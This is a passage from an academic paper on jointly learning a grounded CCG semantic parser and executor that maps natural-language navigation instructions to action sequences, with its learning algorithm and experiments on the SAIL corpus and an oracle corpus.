instructions, for example by trying to replicate actions taken by humans. In particular, we show that, given only a small seed lexicon and a task-specific executor, we can induce high quality models for interpreting complex instructions. We evaluate the method on a benchmark naviga- tional instructions dataset (MacMahon et al., 2006; Chen & Mooney, 2011). Our joint approach suc- cessfully completes 60% more instruction sets rel- ative to the previous state of the art. We also re- port experiments that vary supervision type, finding that observing the final position of an instruction ex- ecution is nearly as informative as observing the en- tire path. Finally, we present improved results on a new version of the MacMahon et al. (2006) corpus, which we filtered to include only executable instruc- tions paired with correct traces. 2 Technical Overview Task Let S be the set of possible environment states and A be the set of possible actions. Given a start state s ∈ S and a natural language instruc- tion x, we aim to generate a sequence of actions ~a = 〈a1, . . . ,an〉, with each ai ∈ A, that performs the steps described in x. For example, in the navigation domain (MacMa- hon et al., 2006), S is a set of positions on a map. Each state s = (x,y,o) is a triple, where x and y are integer grid coordinates and o ∈{0, 90, 180, 270} is an orientation. Figure 2 shows an example map with 36 states; the ones we use in our experiments con- tain an average of 141. The space of possible actions A is {LEFT, RIGHT, MOVE, NULL}. Actions change the state of the world according to a transition func- tion T : A×S → S. In our navigation example, moving forward can change the x or y coordinates while turning changes the orientation o. Model To map instructions to actions, we jointly reason about linguistic meaning and action execu- tion. We use a weighted CCG grammar to rank pos- sible meanings z for each instruction x. Section 6 defines how to design such grammars for instruc- tional language. Each logical form z is mapped to a sequence of actions ~a with a deterministic executor, as described in Section 7. The final grounded CCG model, detailed in Section 6.3, jointly constructs and scores z and ~a, allowing for robust situated reason- ing during semantic interpretation. Learning We assume access to a training set con- taining n examples {(xi,si,Vi) : i = 1 . . .n}, each containing a natural language sentence xi, a start state si, and a validation function Vi. The validation function Vi : A → {0, 1} maps an action sequence ~a ∈ A to 1 if it’s correct according to available su- pervision, or 0 otherwise. This training data contains no direct evidence about the logical form zi for each xi, or the grounded CCG analysis used to construct zi. We model all these choices as latent variables. We experiment with two validation functions. The first, VD(~a), has access to an observable demonstra- tion of the execution ~ai, a given ~a is valid iff ~a = ~ai. The second, VSi (~a), only encodes the final state s′i of the execution of x, therefore ~a is valid iff its final state is s′i. Since numerous logical forms often ex- ecute identically, both functions provide highly am- biguous supervision. Evaluation We evaluate task completion for sin- gle instructions on a test set {(xi,si,s′i) : i = 1 . . .n}, where s′i is the final state of an oracle agent following the execution of xi starting at state si. We will also report accuracies for correctly interpreting instruction sequences ~x, where a single error can cause the entire sequence to fail. Finally, we report accuracy on recovering correct logical forms zi on a manually annotated subset of the test set. 3 Related Work Our learning is inspired by the reinforcement learn- ing (RL) approach of Branavan et al. (2009), and related methods (Vogel & Jurafsky, 2010), but uses latent variable model updates within a semantic parser. Branavan et al. (2010) extended their RL ap- proach to model high-level instructions, which cor- respond to implicit actions in our domain. Wei et al. (2009) and Kollar et al. (2010) used shallow linguis- tic representations for instructions. Recently, Tellex 50 et al. (2011) used a graphical model semantics rep- resentation to learn from instructions paired with demonstrations. In contrast, we model significantly more complex linguistic phenomena than these ap- proaches, as required for the navigation domain. Other research has adopted expressive meaning representations, with differing learning approaches. Matuszek et al. (2010, 2012) describe supervised al- gorithms that learn semantic parsers for navigation instructions. Chen and Mooney (2011), Chen (2012) and Kim and Mooney (2012) present state-of-the- art algorithms for the navigation task, by training a supervised semantic parser from automatically in- duced labels. Our work differs in the use of joint learning and inference approaches. Supervised approaches for learning semantic parsers have received significant attention, e.g. Kate and Mooney (2006), Wong and Mooney (2007), Muresan (2011) and Kwiatkowski et al. (2010, 2012). The algorithms we develop in this pa- per combine ideas from previous supervised CCG learning work (Zettlemoyer & Collins, 2005, 2007; Kwiatkowski et al., 2011), as we describe in Sec- tion 4. Recently, various alternative forms of su- pervision were introduced. Clarke et al. (2010), Goldwasser and Roth (2011) and Liang et al. (2011) describe approaches for learning semantic parsers from sentences paired with responses, Krishna- murthy and Mitchell (2012) describe using distant supervision, Artzi and Zettlemoyer (2011) use weak supervision from conversational logs and Gold- wasser et al. (2011) present work on unsupervised learning. We discuss various forms of supervision that complement these approaches. There has also been work on learning for semantic analysis tasks from grounded data, including event streams (Liang et al., 2009; Chen et al., 2010) and language paired with visual perception (Matuszek et al., 2012). Finally, the topic of executing instructions in non-learning settings has received significant atten- tion (e.g., Winograd (1972), Di Eugenio and White (1992), Webber et al. (1995), Bugmann et al. (2004), MacMahon et al. (2006) and Dzifcak et al. (2009)). 4 Background We use a weighted linear CCG grammar for seman- tic parsing, as briefly reviewed in this section. Combinatory Categorial Grammars (CCGs) CCGs are a linguistically-motivated formalism for modeling a wide range of language phenom- ena (Steedman, 1996, 2000). A CCG is defined by a lexicon and a set of combinators. The lexicon con- tains entries that pair words or phrases with cate- gories. For example, the lexical entry chair ` N : λx.chair(x) for the word “chair” in the parse in Fig- ure 4 pairs it with a category that has syntactic type N and meaning λx.chair(x). Figure 4 shows how a CCG parse builds a logical form for a complete sen- tence in our example navigation domain. Starting from lexical entries, each intermediate parse node, including syntax and semantics, is constructed with one of a small set of CCG combinators (Steedman, 1996, 2000). We use the application, composition and coordination combinators, and three others de- scribed in Section 6.3. Factored CCG Lexicons Recently, Kwiatkowski et al. (2011) introduced a factored CCG lexicon representation. Each lexical item is composed of a lexeme and a template. For example, the entry chair ` N : λx.chair(x) would be constructed by combining the lexeme chair ` [chair], which con- tains a word paired with logical constants, with the template λv.[N : λx.v(x)], that defines the rest of the category by abstracting over logical constants. This approach allows the reuse of common syntactic structures through a small set of templates. Section 8 describes how we learn such lexical entries. Weighted Linear CCGs A weighted linear CCG (Clark & Curran, 2007) ranks the space of possible parses under the grammar, and is closely related to several other approaches (Lafferty et al., 2001; Collins, 2004; Taskar et al., 2004). Let x be a sentence, y be a CCG parse, and GEN(x; Λ) be the set of all possible CCG parses for x given the lexi- con Λ. Define φ(x,y) ∈ Rd to be a d-dimensional feature–vector representation and θ ∈ Rd to be a pa- rameter vector. The optimal parse for sentence x is y∗(x) = arg max y∈GEN(x;Λ) θ ·φ(x,y) and the final output logical form z is the λ-calculus expression at the root of y∗(x). Section 7.2 de- scribes how we efficiently compute an approxima- tion to y∗(x) within the joint interpretation and exe- cution model. 51 Supervised learning with GENLEX Previous work (Zettlemoyer & Collins, 2005) introduced a function GENLEX(x,z) to map a sentence x and its meaning z to a large set of potential lexical entries. These entries are generated by rules that consider the logical form z and guess potential CCG categories. For example, the rule p → N : λx.p(x) introduces categories commonly used to model certain types of nouns. This rule would, for example, introduce the category N : λx.chair(x) for any logical form z that contains the constant chair. GENLEX uses a small set of such rules to generate categories that are paired with all possible substrings in x, to create a large set of lexical entries. The complete learning algorithm then simultaneously selects a small sub- set of these entries and estimates parameter values θ. In Section 8, we will introduce a new way of using GENLEX to learn from different signals that, crucially, do not require a labeled logical form z. 5 Spatial Environment Modeling We will execute instructions in an environment, see Section 2, which has a set of positions. A position is a triple (x,y,o), where x and y are horizontal and vertical coordinates, and o ∈ O = {0, 90, 180, 270} is an orientation. A position also includes properties indicating the object it contains, its floor pattern and its wallpaper. For example, the square at (4, 3) in Figure 2 has four positions, one per orientation. Because instructional language refers to objects and other structures in an environment, we introduce the notion of a position set. For example, in Figure 2, the position set D = {(5, 3,o) : o ∈ O} represents a chair, while B = {(x, 3,o) : o ∈ O,x ∈ [0 . . . 5]} represents the blue floor. Both sets contain all ori- entations for each (x,y) pair, thereby representing properties of regions. Position sets can have many properties. For example, E, in addition to being a chair, is also an intersection because it overlaps with the neighboring halls A and B. The set of possi- ble entities includes all position sets and a few addi- tional entries. For example, set C = {(4, 3, 90)} in Figure 2 represents the agent’s position. 6 Modeling Instructional Language We aim to design a semantic representation that is learnable, models grounded phenomena such as spa- X y 1 2 3 4 5 1 2 3 4 5 270 90 0 180 C D E A B { D E } (a) chair λx.chair(x){ A B } (b) hall λx.hall(x) E (c) the chair ιx.chair(x) C (d) you you{ B } (e) blue hall λx.hall(x) ∧ blue(x) { E } (f) chair in the intersection λx.chair(x) ∧ intersect(ιy.junction(y),x){ A B E } (g) in front of you λx.in front of(you,x) Figure 2: Schematic diagram of a map environment and example of semantics of spatial phrases. tial relations and object reference, and is executable. Our semantic representation combines ideas from Carpenter (1997) and Neo-Davidsonian event se- mantics (Parsons, 1990) in a simply typed λ- calculus. There are four basic types: (1) entities e that are objects in the world, (2) events ev that spec- ify actions in the world, (3) truth values t, and (4) meta-entities m, such as numbers or directions. We also allow functional types, which are defined by in- put and output types. For example, 〈e,t〉 is the type of function from entities to truth values. 6.1 Spatial Language Modeling Nouns and Noun Phrases Noun phrases are paired with e-type constants that name specific en- tities and nouns are mapped to 〈e,t〉-type expres- sions that define a property. For example, the noun “chair” (Figure 2a) is paired with the expression λx.chair(x), which defines the set of objects for 52 which the constant chair returns true. The deno- tation of this expression is the set {D,E} in Fig- ure 2 and the denotation of λx.hall(x) (Figure 2b) is {A,B}. Also, the noun phrase “you” (Figure 2d), which names the agent, is represented by the con- stant you with denotation C, the agent’s position. Determiners Noun phrases can also be formed by combining nouns with determiners that pick out spe- cific objects in the world. We consider both definite reference, which names contextually unique objects, and indefinites, which are less constrained. The definite article is paired with a logical expres- sion ι of type 〈〈e,t〉,e〉,1 which will name a sin- gle object in the world. For example, the phrase “the chair” in Figure 2c will be represented by ιx.chair(x) which will denote the appropriate chair. However, computing this denotation is challenging when there is perceptual ambiguity, for positions where multiple chairs are visible. We adopt a sim- ple heuristic approach that ranks referents based on a combination of their distance from the agent and whether they are in front of it. For our example, from position C our agent would pick the chair E in front of it as the denotation. The approach dif- fers from previous, non-grounded models that fail to name objects when faced with such ambiguity (e.g., Carpenter (1997), Heim and Kratzer (1998)). To model the meaning of indefinite articles, we depart from the Frege-Montague tradition of us- ing existential quantifiers (Lewis, 1970; Montague, 1973; Barwise & Cooper, 1981), and instead in- troduce a new quantifier A that, like ι, has type 〈〈e,t〉,e〉. For example, the phrase “a chair” would be paired with Ax.chair(x) which denotes an arbi- trary entry from the set of chairs in the world. Com- puting the denotation for such expressions in a world will require picking a specific object, without fur- ther restrictions. This approach is closely related to Steedman’s generalized Skolem terms (2011).2 Meta Entities We use m-typed terms to represent non-physical entities, such as numbers (1, 2, etc.) and directions (left, right, etc.) whose denotations 1Although quantifiers are logical constants with type 〈〈e,t〉,e〉 or 〈〈e,t〉, t〉, we use a notation similar to that used for first-order logic. For example, the notation ιx.f(x) repre- sents the logical expression ι(λx.f(x)) 2Steedman (2011) uses generalized Skolem terms as a tool for resolving anaphoric pronouns, which we do not model. are fixed. The ability to refer to directions allows us to manipulate position sets. For example, the phrase “your left” is mapped to the logical expres- sion orient(you,left), which denotes the position set containing the position to the left of the agent. Prepositions and Adjectives Noun phrases with modifiers, such as adjectives and prepositional phrases are 〈e,t〉-type expressions that implement set intersection with logical conjunctions. For ex- ample in Figure 2, the phrase “blue hall” is paired with λx.hall(x)∧blue(x) with denotation {B} and the phrase “chair in the intersection” is paired with λx.chair(x) ∧ intersect(ιy.junction(y),x) with denotation {E}. Intuitively, the adjective “blue” introduces the constant blue and “in the” adds a intersect. We will describe the full details of how these expressions are constructed in Section 6.3. Spatial Relations The semantic representation al- lows more complex reasoning over position sets and the relations between them. For example, the bi- nary relation in front of (Figure 2g) tests if the first argument is in front of the second from the point of view of the agent. Additional relations are used to model set intersection, relative direction, relative distance, and relative position by distance. 6.2 Modeling Instructions To model actions in the world, we adopt Neo- Davidsonian event semantics (Davidson, 1967; Par- sons, 1990), which treats events as ev-type primitive objects. Such an approach allows for a compact lex- icon where adverbial modifiers introduce predicates, which are linked by a shared event argument. Instructional language is characterized by heavy usage of imperatives, which we model as func- tions from events to truth values.3 For example, an imperative such as “move” would have the mean- ing λa.move(a), which defines a set of events that match the specified constraints. Here, this set would include all events that involve moving actions. The denotation of ev-type terms is a sequence of n instances of the same action. In this way, an event defines a function ev : s → s′, where s is the start state and s′ the end state. For example, the 3Imperatives are 〈ev,t〉-type, much like 〈e,t〉-type wh- interrogatives. Both define sets, the former includes actions to execute, the later defines answers to a question. 53 denotation of λa.move(a) is the set of move action sequences {〈MOVE1, . . . , MOVEn〉 : n ≥ 1}. Al- though performing actions often require performing additional ones (e.g., the agent might have to turn before being able to move), we treat such actions as implicit (Section 7.1), and don’t model them explic- itly within the logical form. Predicates such as move (seen above) and turn are introduced by verbs. Events can also be modified by adverbials, which are intersective, much like prepositional phrases. For example in the imperative, logical form (LF) pair: Imp.: move from the sofa to the chair LF: λa.move(a) ∧ to(a,ιx.chair(x)) ∧ from(a,ιy.sofa(y)) Each adverbial phrase provides a constraint, and changing their order will not change the LF. 6.3 Parsing Instructional Language with CCG To compose logical expressions from sentences we use CCG, as described in Section 4. Figures 3 and 4 present a sample of lexical entries and how they are combined, as we will describe in this section. The basic syntactic categories are N (noun), NP (noun phrase), S (sentence), PP (prepositional phrase), AP (adverbial phrase), ADJ (adjective) and C (a special category for coordinators). Type Raising To compactly model syntactic vari- ations, we follow Carpenter (1997), who argues for polymorphic typing. We include the more simple, or lower type, entry in the lexicon and introduce type- raising rules to reconstruct the other when necessary at parse time. We use four rules: PP : g → N\N : λf.λx.f(x) ∧g(x) ADJ : g → N/N : λf.λx.f(x) ∧g(x) AP : g → S\S : λf.λa.f(a) ∧g(a) AP : g → S/S : λf.λa.f(a) ∧g(a) where the first three are for prepositional, adjectival and adverbial modifications, and the fourth models the fact that adverbials are often topicalized.4 Fig- ures 3 and 4 show parses that use type-raising rules. Indefinites As discussed in Section 6.1, we use a new syntactic analysis for indefinites, follow- 4Using type-raising rules can be particularly useful when learning from sparse data. For example, it will no longer be necessary to learn three lexical entries for each adverbial phrase (with syntax AP , S\S, and S/S). chair in the corner N PP/NP NP/N N λx.chair(x) λx.λy.intersect(x,y) λf.Ax.f(x) λx.corner(x) > NP ιx.corner(x) > PP λy.intersect(ιx.corner(x),y) N\N λf.λy.f(y) ∧ intersect(ιx.chair(x),y) < N λy.chair(y) ∧ intersect(ιx.chair(x),y) Figure 3: A CCG parse with a prepositional phrase. ing Steedman (2011). Previous approaches would build parses such as with a lamp PP/NP PP\(PP/NP)/N N λx.λy.intersect(x,y) λf.λg.λy.∃x.g(x,y) ∧ f(x) λx.lamp(x) > PP\(PP/NP) λg.λy.∃x.g(x,y) ∧ lamp(x) < PP λy.∃x.intersect(x,y) ∧ lamp(x) where “a” has the relatively complex syntactic cate- gory PP\(PP/NP)/N and where similar entries would be needed to quantify over different types of verbs (e.g., S\(S/NP)/N) and adverbials (e.g., AP\(AP/NP)/N). Instead, we include a single lexical entry a ` NP/N : λf.Ax.f(x) which can be used to construct the correct meaning in all cases. 7 Joint Parsing and Execution Our inference includes an execution component and a parser. The parser maps sentences to logical forms, and incorporates the grounded execution model. We first discuss how to execute logical forms, and then describe the joint model for execution and parsing. 7.1 Executing Logical Expressions Dynamic Models In spatial environments, such as the ones in our task, the agent’s ability to observe the world depends on its current state. Taking this aspect of spatial environments into account is challenging, but crucial for correct evaluation. To represent the agent’s point of view, for each state s ∈ S, as defined in Section 2, let Ms be the state-dependent logical model. A model M consists of a domain DM,T of objects for each type T and an interpretation function IM,T : OT → DM,T , where OT is the set of T -type constants. IM,T maps logical symbols to T -type objects, for exam- ple, it will map you to the agent’s position. We have domains for position sets, actions and so on. Fi- nally, let VT be the set of variables of type T , and 54 facing the lamp go until you reach a chair AP/NP NP/N N S AP/S NP S\NP/NP NP/N N λx.λa.pre(a, λf.ιx.f(x) λx.lamp(x) λa.move(a) λs.λa.post(a,s) you λx.λy.intersect(x,y) λf.Ax.f(x) λx.chair(x) front(you,x)) > > NP NP ιx.lamp(x) Ax.chair(x) > > AP S\NP λa.pre(a,front(you,ιx.lamp(x))) λy.intersect(Ax.chair(x),y) < S/S S λf.λa.f(a) ∧ pre(a,front(you,ιx.lamp(x))) intersect(Ax.chair(x),you) > AP λa.post(a,intersect(Ax.chair(x),you)) S\S λf.λa.f(a) ∧ post(a,intersect(Ax.chair(x),you)) < S λa.move(a) ∧ post(a,intersect(Ax.chair(x),you)) > S λa.move(a) ∧ post(a,intersect(Ax.chair(x),you)) ∧ pre(a,front(you,ιx.lamp(x))) Figure 4: A CCG parse showing adverbial phrases and topicalization. AT : VT → ⋃ s∈S DMs,T be the assignment func- tion, which maps variables to domain objects. For each model Ms the domain DMs,ev is a set of action sequences {〈a1, ...,an〉 : n ≥ 1}. Each ~a defines a sequences of states si, as defined in Sec- tion 6.2, and associated models Msi. The key chal- lenge for execution is that modifiers of the event will need to be evaluated under different models from this sequence. For example, consider the sentence in Figure 4. To correctly execute, the pre literal, in- troduced by the “facing” phrase, it must be evaluated in the model Ms0 for the initial state s0. Similarly, the literal including post requires the final model Msn+1 . Such state dependent predicates, including pre and post, are called stateful. The list of stateful predicates is pre-defined and includes event modi- fiers, as well the ι quantifier, which is evaluated un- der Ms0 , since definite determiners are assumed to name objects visible from the start position. In gen- eral, a logical expression is traversed depth first and the model is updated every time a stateful predicate is reached. For example, the two e-type you con- stants in Figure 4 will be evaluated under different models: the one within the pre literal under Ms0 , and the one inside the post literal under Msn+1 . Evaluation Given a logical expression l, we can compute the interpretation IMs0,T (l) by recursively mapping each subexpression to an entry on the ap- propriate model M. To reflect the changing state of the agent during evaluation, we define the function update(~a,pred). Given an action sequence ~a and a stateful predi- cate pred, update returns a model Ms, where s is the state under which the literal containing pred should be interpreted, either the initial state or one visited while executing ~a. For example, given the predicate post and the action sequence 〈a1, . . . ,an〉, update(〈a1, . . . ,an〉,post) = Msn+1 , where sn+1 the state of the agent following action an. By con- vention, we place the event variable as the first argu- ment in literals that include one. Given a T -type logical expression l and a start- ing state s0, we compute its interpretation IMs0,T (l) recursively, following these three base cases: • If l is a λ operator of type 〈T1,T2〉 binding vari- able v and body b, IMs,T (l) is a set of pairs from DT1 ×DT2 , where DT1,DT2 ∈ Ms. For each object o ∈ DT1 , we create a pair (o,i) where i is the interpretation IMs,T2 (b) com- puted under a variable assignment function ex- tended to map AT2 (v) = o. • If l is a literal c(c1, . . . ,cn) with n argu- ments where c has type P and each ci has type Pi, IMs,T (l) is computed by first in- terpreting the predicate c to the function f = IMs,T (c). In most cases, IMs,T (l) = f(IMs,P1 (c1), . . . ,IMs,Pn(cn)). However, if c is a stateful predicate, such as pre or post, we instead first retrieve the appropriate new model Ms′ = update(IMs,P1 (c1),c), where c1 is the event argument and IMs,P1 (c1) is its interpre- tation. Then, the final results is IMs,T (l) = f(IMs′,P1 (c1), . . . ,IMs′,Pn(cn)). • If l is a T -type constant or variable, IMs,T (l). The worst case complexity of the process is ex- ponential in the number of bound variables. Al- though in practice we observed tractable evaluation in the majority of development cases we considered, a more comprehensive and tractable evaluation pro- cedure is an issue that we leave for future work. 55 Implicit Actions Instructional language rarely specifies every action required for execution, see MacMahon (2007) for a detailed discussion in the maps domain. For example, the sentence in Fig- ure 4 can be said even if the agent is not facing a blue hallway, with the clear implicit request that it should turn to face such a hallway before moving. To allow our agent to perform implicit actions, we extend the domain of ev-type variables by allowing the agent to prefix up to kI action sequences before each explicit event. For example, in the agent’s po- sition in Figure 2 (set C), the set of possible events includes 〈MOVEI, MOVEI, RIGHTI, MOVE〉, which contains two implicit sequences (marked by I). Resolving Action Ambiguity Logical forms of- ten fail to determine a unique action sequences, due to instruction ambiguity. For example, con- sider the instruction “go forward” and the agent state as specified in Figure 2 (set C). The instruction, which maps to λa.move(a) ∧ forward(a), evalu- ates to the set containing 〈MOVE〉, 〈MOVE, MOVE〉 and 〈MOVE, MOVE, MOVE〉, as well as five other se- quences that have implicit prefixes followed by ex- plicit MOVE actions. To resolve such ambiguity, we prefer shorter actions without implicit actions. In the example above, we will select 〈MOVE〉, which includes a single action and no implicit actions. 7.2 Joint Inference We incorporate the execution procedure described above with a linear weighted CCG parser, as de- scribed in Section 4, to create a joint model of pars- ing and execution. Specifically, we execute logi- cal forms in the current state and observe the result of their execution. For example, the word “chair” can be used to refer to different types of objects, in- cluding chairs, sofas, and barstools, in the maps do- mains. Our CCG grammar would include a lexical item for each meaning, but execution might fail de- pending on the presence of objects in the world, in- fluencing the final parse output. Similarly, allowing implicit actions provides robustness when resolv- ing these and other ambiguities. For example, an instruction with the precondition phrase “from the chair” might require additional actions to reach the position with the named object. To allow such joint reasoning we define an ex- ecution e to include a parse tree ey and trace e~a, and define our feature function to be Φ(xi,si,e), where xi is an instruction and si is the start state. This approach allows joint dependencies: the state of the world influences how the agent interprets words, phrases and even complete sentences, while language understanding determines actions. Finally, to execute sequences of instructions, we execute each starting from the end state of the previ- ous one, using a beam of size ks. 8 Learning Figure 5 presents the complete learning algorithm. Our approach is online, considering each example in turn and performing two steps: expanding the lex- icon and updating parameters. The algorithm as- sumes access to a training set {(xi,si,Vi) : i = 1 . . .n}, where each example includes an instruction xi, starting state si and a validation function Vi, as defined in Section 2. In addition the algorithm takes a seed lexicon Λ0. The output is a joint model, that includes a lexicon Λ and parameters θ. Coarse Lexical Generation To generate po- tential lexical entries we use the function GENLEX(x,s,V; Λ,θ), where x is an in- struction, s is a state and V is a validation function. Λ is the current lexicon and θ is a parameter vector. In GENLEX we use coarse logical constants, as described below, to efficiently prune the set of potential lexical entries. This set is then pruned further using more precise inference in Step 1. To compute GENLEX, we initially generate a large set of lexical entries and then prune most of them. The full set is generated by taking the cross product of a set of templates, computed by factor- ing out all templates in the seed lexicon Λ0, and all logical constants. For example, if Λ0 has a lexical item with the category AP/NP : λx.λa.to(a,x) we would create entries w ` AP/NP : λx.λa.p(a,x) for every phrase w in x and all constants p with the same type as to.5 In our development work, this approach often generated nearly 100k entries per sentence. To ease 5Generalizing previous work (Kwiatkowski et al., 2011), we allow templates that abstract subsets of the constants in a lex- ical item. For example, the seed entry facing ` AP/NP : λx.λa.pre(a,front(you,x)) would create 7 templates. 56 Inputs: Training set {(xi,si,Vi) : i = 1 . . .n} where xi is a sentence, si is a state and Vi is a validation function, as de- scribed in Section 2. Initial lexicon Λ0. Number of iterations T . Margin γ. Beam size k for lexicon generation. Definitions: Let an execution e include a parse tree ey and a trace e~a. GEN(x,s; Λ) is the set of all possible execu- tions for the instruction x and state s, given the lexicon Λ. LEX(y) is the set of lexical entries used in the parse tree y. Let Φi(e) be shorthand for the feature function Φ(xi,si,e) defined in Section 7.2. Define ∆i(e,e′) = |Φi(e)−Φi(e′)|1. GENLEX(x,s,V; λ,θ) takes as input an instruction x, state s, validation function V, lexicon λ and model param- eters θ, and returns a set of lexical entries, as defined in Sec- tion 8. Finally, for a set of executions E let MAXVi(E; θ) be {e|∀e′ ∈ E,〈θ, Φi(e′)〉≤ 〈θ, Φi(e)〉∧Vi(e~a) = 1}, the set of highest scoring valid executions. Algorithm: Initialize θ using Λ0 , Λ ← Λ0 For t = 1 . . .T,i = 1 . . .n : Step 1: (Lexical generation) a. Set λG ← GENLEX(xi,si,Vi; Λ,θ), λ ← Λ ∪λG b. Let E be the k highest scoring executions from GEN(xi,si; λ) which use at most one entry from λG c. Select lexical entries from the highest scoring valid parses: λi ← ⋃ e∈MAXVi(E;θ) LEX(e y) d. Update lexicon: Λ ← Λ ∪λi Step 2: (Update parameters) a. Set Gi ← MAXVi(GEN(xi,si; Λ); θ) and Bi ←{e|e ∈ GEN(xi,si; Λ) ∧Vi(e~a) 6= 1} b. Construct sets of margin violating good and bad parses: Ri ←{g|g ∈ Gi ∧ ∃b ∈ Bi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} Ei ←{b|b ∈ Bi ∧ ∃g ∈ Gi s.t. 〈θ, Φi(g) − Φi(b)〉 < γ∆i(g,b)} c. Apply the additive update: θ ← θ + 1|Ri| ∑ r∈Ri Φi(r) − 1 |Ei| ∑ e∈Ei Φi(e) Output: Parameters θ and lexicon Λ Figure 5: The learning algorithm. the cost of parsing at this scale, we developed a coarse-to-fine two-pass parsing approach that lim- its the number of new entries considered. The algo- rithm first parses with coarse lexical entries that ab- stract the identities of the logical constants in their logical forms, thereby greatly reducing the search space. It then uses the highest scoring coarse parses to constrain the lexical entries for a final, fine parse. Formally, we construct the coarse lexicon λa by replacing all constants of the same type with a single newly created, temporary constant. We then parse to create a set of trees A, such that each y ∈ A 1. is a parse for sentence x, given the world state s with the combined lexicon Λ ∪λa, 2. scored higher than ey by at least a margin of δL, where ey is the tree of e, the highest scoring execution of x, at position s under the current model, s.t. V(e~a) = 1, 3. contains at most one entry from λa. Finally, from each entry l ∈ {l|l ∈ λa ∧ l ∈ y ∧ y ∈ A}, we create multiple lexical entries by replacing all temporary constants with all possible appropriately typed constants from the original set. GENLEX returns all these lexical entries, which will be used to form our final fine-level analysis. Step 1: Lexical Induction To expand our model’s lexicon, we use GENLEX to generate candidate lexical entries and then further refine this set by pars- ing with the current model. Step 1(a) in Figure 5 uses GENLEX to create a temporary set of po- tential lexical entries λG. Steps (b-d) select a small subset of these lexical entries to add to the current lexicon Λ: we find the k-best executions under the model, which use at most one entry from λG, find the entries used in the best valid executions and add them to the current lexicon. Step 2: Parameter Update We use a variant of a loss-driven perceptron (Singh-Miller & Collins, 2007; Artzi & Zettlemoyer, 2011) for parameter up- dates. However, instead of taking advantage of a loss function we use a validation signal. In step (a) we collect the highest scoring valid parses and all in- valid parses. Then, in step (b) we construct the set Ri of valid analyses and Ei of invalid ones, such that their model scores are not separated by a mar- gin δ scaled by the number of wrong features (Taskar et al., 2003). Finally, step (f) applies the update. Discussion The algorithm uses the validation sig- nal to drive both lexical induction and parameter updates. Unlike previous work (Zettlemoyer & Collins, 2005, 2007; Artzi & Zettlemoyer, 2011), we have no access to a set of logical constants, either through the the labeled logical form or the weak supervision signal, to guide the GENLEX procedure. Therefore, to avoid over-generating lex- ical entries, thereby making parsing and learning intractable, we leverage typing for coarse parsing to prune the generated set. By allowing a single 57 Oracle SAIL # of instruction sequences 501 706 # of instruction sequences with implicit actions 431 Total # of sentences 2679 3233 Avg. sentences per sequence 5.35 4.61 Avg. tokens per sentence 7.5 7.94 Vocabulary size 373 522 Table 1: Corpora statistics (lower-cased data). new entry per parse, we create a conservative, cas- cading effect, whereas a lexical entry that is intro- duced opens the way for many other sentence to be parsed and introduce new lexical entries. Further- more, grounded features improve parse selection, thereby generating higher quality lexical entries. 9 Experimental Setup Data For evaluation, we use the navigation task from MacMahon et al. (2006), which includes three environments and the SAIL corpus of instructions and follower traces. Chen and Mooney (2011) seg- mented the data, aligned traces to instructions, and merged traces created by different subjects. The corpus includes raw sentences, without any form of linguistic annotation. The original collection pro- cess (MacMahon et al., 2006) created many unin- terpretable instructions and incorrect traces. To fo- cus on the learning and interpretation tasks, we also created a new dataset that includes only accurate in- structions labeled with a single, correct execution trace. From this oracle corpus, we randomly sam- pled 164 instruction sequences (816 sentences) for evaluation, leaving 337 (1863 sentences) for train- ing. This simple effort will allow us to measure the effects of noise on the learning approach and pro- vides a resource for building more accurate algo- rithms. Table 1 compares the two sets. Features and Parser Following Zettlemoyer and Collins (2005), we use a CKY parser with a beam of k. To boost recall, we adopt a two-pass strategy, which allows for word skipping if the initial parse fails. We use features that indicate usage of lexical entries, templates, lexemes and type-raising rules, as described in Section 6.3, and repetitions in logical coordinations. Finally, during joint parsing, we con- sider only parses executable at si as complete. Seed Lexicon To construct our seed lexicon we la- beled 12 instruction sequences with 141 lexical en- Single Sentence Sequence Final state validation Complete system 81.98 (2.33) 59.32 (6.66) No implicit actions 77.7 (3.7) 38.46 (1.12) No joint execution 73.27 (3.98) 31.51 (6.66) Trace validation Complete system 82.74 (2.53) 58.95 (6.88) No implicit actions 77.64 (3.46) 38.34 (6.23) No joint execution 72.85 (4.73) 30.89 (6.08) Table 2: Cross-validation development accuracy and standard deviation on the oracle corpus. tries. The sequences were randomly selected from the training set, so as to include two sequences for each participant in the original experiment. Fig- ures 3 and 4 include a sample of our seed lexicon. Initialization and Parameters We set the weight of each template indicator feature to the number of times it is used in the seed lexicon and each repeti- tion feature to -10. Learning parameters were tuned using cross-validation on the training set: the mar- gin δ is set to 1, the GENLEX margin δL is set to 2, we use 6 iterations (8 for experiments on SAIL) and take the 250 top parses during lexical genera- tion (step 1, Figure 5). For parameter update (step 2, Figure 5) we use a parser with a beam of 100. GENLEX generates lexical entries for token se- quences up to length 4. ks, the instruction sequence execution beam, is set to 10. Finally, kI is set to 2, allowing up to two implicit action sequences per explicit one. Evaluation Metrics To evaluate single instruc- tions x, we compare the agent’s end state to a labeled state s′, as described in Section 2. We use a similar method to evaluate the execution of instruction se- quences ~x, but disregard the orientation, since end goals in MacMahon et al. (2006) are defined with- out orientation. When evaluating logical forms we measure exact match accuracy. 10 Results We repeated each experiment five times, shuffling the training set between runs. For the development cross-validation runs, we also shuffled the folds. As our learning approach is online, this allows us to ac- count for performance variations arising from train- ing set ordering. We report mean accuracy and stan- dard deviation across all runs (and all folds). 58 Single Sentence Sequence Chen and Mooney (2011) 54.4 16.18 Chen (2012) 57.28 19.18 + additional data 57.62 20.64 Kim and Mooney (2012) 57.22 20.17 Trace validation 65.28 (5.09) 31.93 (3.26) Final state validation 64.25 (5.12) 30.9 (2.16) Table 3: Cross-validation accuracy and standard de- viation for the SAIL corpus. Table 2 shows accuracy for 5-fold cross- validation on the oracle training data. We first varied the validation signal by providing the complete ac- tion sequence or the final state only, as described in Section 2. Although the final state signal is weaker, the results are similar. The relatively large difference between single sentence and sequence performance is due to (1) cascading errors in the more difficult task of sequential execution, and (2) corpus repe- titions, where simple sentences are common (e.g., “turn left”). Next, we disabled the system’s ability to introduce implicit actions, which was especially harmful to the full sequence performance. Finally, ablating the joint execution decreases performance, showing the benefit of the joint model. Table 3 lists cross validation results on the SAIL corpus. To compare to previous work (Chen & Mooney, 2011), we report cross-validation results over the three maps. The approach was able to cor- rectly execute 60% more sequences then the previ- ous state of the art (Kim & Mooney, 2012). We also outperform the results of Chen (2012), which used 30% more training data.6 Using the weaker validation signal creates a marginal decrease in per- formance. However, we still outperform all previ- ous work, despite using 